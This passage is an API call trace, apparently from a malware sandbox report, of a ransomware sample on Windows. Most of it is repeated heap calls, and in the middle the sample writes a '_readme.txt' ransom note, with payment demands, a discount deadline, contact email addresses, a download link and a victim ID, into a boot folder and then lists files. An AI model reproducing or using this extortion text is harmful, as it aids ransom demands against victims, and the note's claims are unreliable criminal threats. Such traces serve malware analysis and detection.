hHeap=0x2c0000) returned 1 [0173.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.669] PathFindFileNameW (pszPath="C:\\Boot\\fi-FI\\") returned="fi-FI\\" [0173.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.669] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0173.670] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.670] PathFindFileNameW (pszPath="") returned="" [0173.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.670] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0173.670] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0173.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3aa2818 [0173.670] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3aa2818 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0173.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3a8ca68 [0173.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.670] FreeLibrary (hLibModule=0x759d0000) returned 1 [0173.670] PathAppendW (in: pszPath="C:\\Boot\\fi-FI\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 1 [0173.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.671] PathFileExistsW (pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 0 [0173.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3ad0490 [0173.671] lstrcpyW (in: lpString1=0x3ad0490, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0173.671] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0173.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8db78 [0173.671] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\_readme.txt" (normalized: "c:\\boot\\fi-fi\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x690 [0173.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3ad8198 [0173.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x858) returned 0x3aa2818 [0173.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3aa2818, cbMultiByte=2136, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 1113 [0173.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x326560 [0173.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad8198 | out: hHeap=0x2c0000) returned 1 [0173.672] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned 1112 [0173.672] WriteFile (in: hFile=0x690, lpBuffer=0x326560*, nNumberOfBytesToWrite=0x458, lpNumberOfBytesWritten=0xa13fb64, lpOverlapped=0x0 | out: lpBuffer=0x326560*, lpNumberOfBytesWritten=0xa13fb64*=0x458, lpOverlapped=0x0) returned 1 [0173.672] CloseHandle (hObject=0x690) returned 1 [0173.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8db78 | out: hHeap=0x2c0000) returned 1 [0173.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad0490 | out: hHeap=0x2c0000) returned 1 [0173.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.673] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e4d9200, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e4d9200, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.673] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e4d9200, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e4d9200, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.673] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0173.673] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e4d9200, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e4d9200, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e4d9200, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0173.673] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e4d9200, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e4d9200, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e4d9200, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0173.673] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59df8 | out: hHeap=0x2c0000) returned 1 [0173.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59df8 [0173.673] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 